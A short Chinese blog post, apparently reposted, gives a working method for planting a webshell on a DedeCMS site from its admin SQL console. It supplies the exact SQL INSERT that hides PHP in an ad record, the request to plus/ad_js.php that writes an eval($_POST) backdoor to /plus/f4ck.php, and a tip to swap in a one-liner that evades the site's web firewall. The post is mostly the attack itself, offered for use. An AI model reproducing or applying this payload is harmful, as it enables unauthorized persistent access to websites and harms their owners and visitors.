今天搞一个dede遇到站长把文件管理器给删掉了,无法上传php文件,那只能用下其他的办法来解决了。这个方法不记得是在哪个网站看过的思路,自己实践了下。
后台——SQL命令运器——执行命令
INSERT INTO `dede_myad` (`aid`, `clsid`, `typeid`, `tagname`, `adname`, `timeset`, `starttime`, `endtime`, `normbody`, `expbody`) VALUES
(2000, 0, 0, ‘indexTopBanner1′, ‘首页顶部导航大图-960*60′, 0, 1297933028, 1300525028, ‘<?php file_put_contents(”f4ck.php”,”<?php eval($_POST[nimeimei]);?>”); ?>’, ”);
然后访问:http://site/plus/ad_js.php?aid=2000 (id可以自己更换)
文件生成在:/plus/f4ck.php
一句话可以自行替换成过狗的
转载请注明:jinglingshu的博客 » [F4CK-小小糖]dede后台没有文件管理器时执行sql语句拿shell方法